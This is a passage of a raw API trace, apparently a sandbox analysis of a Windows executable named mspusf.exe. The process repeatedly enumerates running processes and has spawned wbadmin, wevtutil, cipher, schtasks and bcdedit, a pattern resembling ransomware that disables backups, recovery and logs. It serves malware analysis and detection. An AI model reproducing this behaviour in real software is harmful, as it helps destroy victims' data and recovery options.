(in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.098] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1240) returned 0x0 [0114.098] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0114.098] GetCurrentProcessId () returned 0xf00 [0114.098] GetCurrentProcess () returned 0xffffffff [0114.099] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.099] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12d4) returned 0x508 [0114.099] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0114.099] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0114.099] CloseHandle (hObject=0x508) returned 1 [0114.099] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0114.099] GetCurrentProcessId () returned 0xf00 [0114.099] GetCurrentProcess () returned 0xffffffff [0114.099] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.099] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x130c) returned 0x0 [0114.099] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x135c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x130c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.103] GetCurrentProcessId () returned 0xf00 [0114.103] GetCurrentProcess () returned 0xffffffff [0114.103] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.103] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x135c) returned 0x0 [0114.103] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mspusf.exe")) returned 1 [0114.104] GetCurrentProcessId () returned 0xf00 [0114.104] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.104] GetCurrentProcessId () returned 0xf00 [0114.104] GetCurrentProcess () returned 0xffffffff [0114.104] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.104] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x704) returned 0x508 [0114.104] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0114.105] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0114.105] CloseHandle (hObject=0x508) returned 1 [0114.105] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0114.105] GetCurrentProcessId () returned 0xf00 [0114.105] GetCurrentProcess () returned 0xffffffff [0114.105] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.105] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xafc) returned 0x0 [0114.105] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0114.106] GetCurrentProcessId () returned 0xf00 [0114.106] GetCurrentProcess () returned 0xffffffff [0114.106] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.106] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf24) returned 0x0 [0114.106] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0114.106] GetCurrentProcessId () returned 0xf00 [0114.106] GetCurrentProcess () returned 0xffffffff [0114.107] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.107] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6ec) returned 0x0 [0114.107] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0114.107] GetCurrentProcessId () returned 0xf00 [0114.107] GetCurrentProcess () returned 0xffffffff [0114.107] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.107] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1234) returned 0x0 [0114.107] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="wbadmin.exe")) returned 1 [0114.108] GetCurrentProcessId () returned 0xf00 [0114.108] GetCurrentProcess () returned 0xffffffff [0114.108] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.108] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1208) returned 0x508 [0114.108] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\wbadmin.exe" (normalized: "c:\\windows\\system32\\wbadmin.exe")) returned 0x1f [0114.108] StrStrIW (lpFirst="C:\\Windows\\System32\\wbadmin.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\wbadmin.exe" [0114.108] CloseHandle (hObject=0x508) returned 1 [0114.108] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="wevtutil.exe")) returned 1 [0114.109] GetCurrentProcessId () returned 0xf00 [0114.109] GetCurrentProcess () returned 0xffffffff [0114.109] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.109] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbf8) returned 0x508 [0114.109] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\wevtutil.exe" (normalized: "c:\\windows\\system32\\wevtutil.exe")) returned 0x20 [0114.109] StrStrIW (lpFirst="C:\\Windows\\System32\\wevtutil.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\wevtutil.exe" [0114.109] CloseHandle (hObject=0x508) returned 1 [0114.109] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="wevtutil.exe")) returned 1 [0114.109] GetCurrentProcessId () returned 0xf00 [0114.109] GetCurrentProcess () returned 0xffffffff [0114.109] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.109] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1204) returned 0x508 [0114.110] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\wevtutil.exe" (normalized: "c:\\windows\\system32\\wevtutil.exe")) returned 0x0 [0114.110] CloseHandle (hObject=0x508) returned 1 [0114.110] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cipher.exe")) returned 1 [0114.110] GetCurrentProcessId () returned 0xf00 [0114.110] GetCurrentProcess () returned 0xffffffff [0114.110] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.110] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1198) returned 0x508 [0114.110] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cipher.exe" (normalized: "c:\\windows\\syswow64\\cipher.exe")) returned 0x1e [0114.111] StrStrIW (lpFirst="C:\\Windows\\SysWOW64\\cipher.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SysWOW64\\cipher.exe" [0114.111] CloseHandle (hObject=0x508) returned 1 [0114.111] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbf8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.111] GetCurrentProcessId () returned 0xf00 [0114.111] GetCurrentProcess () returned 0xffffffff [0114.111] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.111] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12c4) returned 0x508 [0114.111] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0114.111] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0114.111] CloseHandle (hObject=0x508) returned 1 [0114.111] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1208, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.112] GetCurrentProcessId () returned 0xf00 [0114.112] GetCurrentProcess () returned 0xffffffff [0114.112] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.112] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x38c) returned 0x508 [0114.112] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0114.112] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0114.112] CloseHandle (hObject=0x508) returned 1 [0114.112] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="schtasks.exe")) returned 1 [0114.113] GetCurrentProcessId () returned 0xf00 [0114.113] GetCurrentProcess () returned 0xffffffff [0114.113] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.113] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x36c) returned 0x508 [0114.113] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20 [0114.113] StrStrIW (lpFirst="C:\\Windows\\System32\\schtasks.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\schtasks.exe" [0114.113] CloseHandle (hObject=0x508) returned 1 [0114.113] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1204, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.114] GetCurrentProcessId () returned 0xf00 [0114.114] GetCurrentProcess () returned 0xffffffff [0114.114] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.114] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xa24) returned 0x508 [0114.114] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0114.114] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0114.114] CloseHandle (hObject=0x508) returned 1 [0114.114] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcdedit.exe")) returned 1 [0114.114] GetCurrentProcessId () returned 0xf00 [0114.114] GetCurrentProcess () returned 0xffffffff [0114.114] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.115] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x58) returned 0x508 [0114.115] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe")) returned 0x1f [0114.115] StrStrIW (lpFirst="C:\\Windows\\System32\\bcdedit.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\bcdedit.exe" [0114.115] CloseHandle (hObject=0x508) returned 1 [0114.115] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="wevtutil.exe")) returned 1 [0114.115] GetCurrentProcessId () returned 0xf00 [0114.115] GetCurrentProcess () returned 0xffffffff [0114.115] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.115] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xdcc) returned 0x508 [0114.116] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\wevtutil.exe" (normalized: "c:\\windows\\system32\\wevtutil.exe")) returned 0x20 [0114.116] StrStrIW (lpFirst="C:\\Windows\\System32\\wevtutil.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\wevtutil.exe" [0114.116] CloseHandle (hObject=0x508) returned 1 [0114.116] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.116] GetCurrentProcessId () returned 0xf00 [0114.117] GetCurrentProcess () returned 0xffffffff [0114.117] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.117] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1128) returned 0x508 [0114.117] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0114.117] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0114.117] CloseHandle (hObject=0x508) returned 1 [0114.117] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1198, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.117] GetCurrentProcessId () returned 0xf00 [0114.117] GetCurrentProcess () returned 0xffffffff [0114.117] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.117] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1130) returned 0x508 [0114.118] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0114.118] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0114.118] CloseHandle (hObject=0x508) returned 1 [0114.118] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x58, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.118] GetCurrentProcessId () returned 0xf00 [0114.118] GetCurrentProcess () returned 0xffffffff [0114.118] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.118] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd74) returned 0x508 [0114.118] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0114.119] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0114.119] CloseHandle (hObject=0x508) returned 1 [0114.119] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xdcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0114.119] GetCurrentProcessId () returned 0xf00 [0114.119] GetCurrentProcess () returned 0xffffffff [0114.119] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.119] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd48) returned 0x508 [0114.119] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0114.119] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0114.119] CloseHandle (hObject=0x508) returned 1 [0114.120] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xdcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0114.120] CloseHandle (hObject=0x4c8) returned 1 [0114.120] Sleep (dwMilliseconds=0x3a98) [0124.158] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4c8 [0124.165] Process32FirstW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.165] GetCurrentProcessId () returned 0xf00 [0124.165] GetCurrentProcess () returned 0xffffffff [0124.165] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.165] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0124.165] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0124.166] GetCurrentProcessId () returned 0xf00 [0124.166] GetCurrentProcess () returned 0xffffffff [0124.166] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0124.166] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0124.166] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0124.170] GetCurrentProcessId () returned 0xf00 [0124.170] GetCurrentProcess () returned 0xffffffff [0124.170] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: 